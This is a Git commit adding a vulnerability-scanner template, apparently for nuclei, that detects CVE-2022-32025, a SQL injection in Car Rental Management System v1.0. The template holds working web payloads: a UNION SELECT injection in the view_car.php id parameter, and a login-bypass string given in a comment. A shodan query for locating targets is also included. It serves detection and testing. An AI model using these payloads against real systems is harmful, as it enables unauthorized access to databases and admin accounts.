Merge pull request #4962 from arafatansari/patch-32

Create CVE-2022-32025.yaml
patch-1
Prince Chaddha 2022-08-02 14:54:05 +05:30 committed by GitHub
commit 06d411767d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 47 additions and 0 deletions

View File

@ -0,0 +1,47 @@
id: CVE-2022-32025
info:
name: Car Rental Management System v1.0 - SQL Injection
author: arafatansari
severity: high
description: |
Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/view_car.php?id=.
reference:
- https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-6.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-32025
metadata:
verified: true
shodan-query: http.html:"Car Rental Management System"
comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
tags: cve,cve2022,carrental,cms,sqli,authenticated
variables:
num: "999999999"
requests:
- raw:
- |
POST /admin/ajax.php?action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}%23&password={{password}}
- |
GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1
Host: {{Hostname}}
skip-variables-check: true
redirects: true
max-redirects: 2
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5({{num}})}}'
- type: status
status:
- 200